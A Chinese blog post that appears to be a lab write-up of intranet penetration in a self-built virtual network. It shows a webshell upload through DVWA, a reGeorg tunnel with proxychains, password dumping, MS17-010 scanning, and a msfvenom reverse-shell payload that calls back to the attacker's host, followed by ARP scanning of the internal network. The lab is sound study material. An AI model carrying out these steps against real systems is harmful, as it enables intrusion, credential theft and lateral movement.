初探内网渗透

搭建一个内网环境,做一次简单的内网渗透

  • 拓扑概览
    • 环境搭建
  • 渗透攻击
    • getshell
    • 建立隧道
    • 配置代理
    • 远程桌面
    • 内网探测
    • 漏洞探测
  • 单内网渗透
    • 反弹shell
    • 添加路由
    • 内网扫描

拓扑概览

图画的有些烂,基本是这样的:
0:vm1网络关闭DHCP
1:win2003充当路由器,桥接,内网IP 10.1.1.254是静态ip,10.3.139.44是自动获取的
初探内网渗透_第1张图片

2:VMware虚拟机充当交换机
3:win7是内网渗透中的内网机器,不做任何网络配置(除了连接VM1网络)
4:win2008安装phpstudy、DHCP、DNS
5:kali采用NAT连接
初探内网渗透_第2张图片
抽象来说,现在就是双内网的情况,kali在一个内网环境中,靶机在一个内网环境中,如下图所示
初探内网渗透_第3张图片

环境搭建

win2008:

phpstudy来做web服务
安装DNS
安装DHCP  

开启phpstudy的openssl.dll,方面后面使用冰蝎(地址)
初探内网渗透_第4张图片
其他:太繁琐,步骤略

渗透攻击

getshell

1:配置冰蝎
由于不知道原来的密码是多少,所以自己写一个密码,计算一下md5值,取值的前16位。譬如123456的md5值是e10adc3949ba59abbe56e057f20f883e,得到e10adc3949ba59ab
初探内网渗透_第5张图片
2:上传木马
直接上传冰蝎里面的文件shell.php
初探内网渗透_第6张图片
3:访问木马
所在目录如下,访问之后没有报错,就是成了

http://10.3.139.44/DVWA-master/vulnerabilities/upload/../../hackable/uploads/shell.php

4:连接冰蝎
初探内网渗透_第7张图片
5:你会发现IP不一致,再次说明,web服务架设在10.1.1.10,端口映射到了10.3.139.44
初探内网渗透_第8张图片

建立隧道

使用reGeorg来搭建HTTP隧道
1:相关文件上传至kali
初探内网渗透_第9张图片

初探内网渗透_第10张图片
2:访问顺利
初探内网渗透_第11张图片
3:使用隧道
初探内网渗透_第12张图片

配置代理

使用代理proxychains

sudo vim /etc/proxychains.conf

初探内网渗透_第13张图片

远程桌面

连接win2008proxychains rdesktop 127.0.0.1
之所以连的是win2008是因为虽然之前冰蝎查看ip的时候发现ip是win2008的,所以远程桌面时自然也是win2008,win2003只是映射了win2008的web
初探内网渗透_第14张图片
冰蝎上传GetPassword_x64.exe读取密码成功
初探内网渗透_第15张图片
初探内网渗透_第16张图片

远程登录,不太确定是什么原因,转圈圈而进不去,辗转多次仍然失败,放弃。
初探内网渗透_第17张图片

内网探测

内网主机发现,使用msf和nmap总是超时,这就很烦。一个投机取巧的方法是查看win2008的arp表,来大致确定内网主机,直接看到了win7
初探内网渗透_第18张图片

漏洞探测

直接使用永恒之蓝检测一下win7和win2008

use auxiliary/scanner/smb/smb_ms17_010
set RHOSTS 10.1.1.10,128

初探内网渗透_第19张图片
那就用永恒之蓝把win7给搂下来,结果超时了,win7蓝屏了
初探内网渗透_第20张图片

单内网渗透

不清楚什么原因kali的NAT网卡无法上网了,没有修复好,这里更改一下网络环境,调整成单内网情况,把kali桥接一个网卡,靶机仍然保持内网,网络拓扑抽象成下图所示:
初探内网渗透_第21张图片

反弹shell

1:生成一个反弹的木马,然后使用冰蝎把木马上传win2008

 msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=kali的IP lport=4444 -f exe -o re.exe

初探内网渗透_第22张图片
2:运行木马
初探内网渗透_第23张图片
3:kali开启监听

use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set LHOST 你kali的IP
run

拿到meterpreter,直接提权到System
初探内网渗透_第24张图片

添加路由

初探内网渗透_第25张图片

内网扫描

在meterpreter中输入run两下tab补齐会看到很多扫描方式,我这里选了基于ARP的扫描

run post/windows/gather/arp_scanner rhosts=10.1.1.0/24

扫描结果
初探内网渗透_第26张图片
已经知道win7存在永恒之蓝,直接上
初探内网渗透_第27张图片

你可能感兴趣的:(作业,渗透测试,经验分享)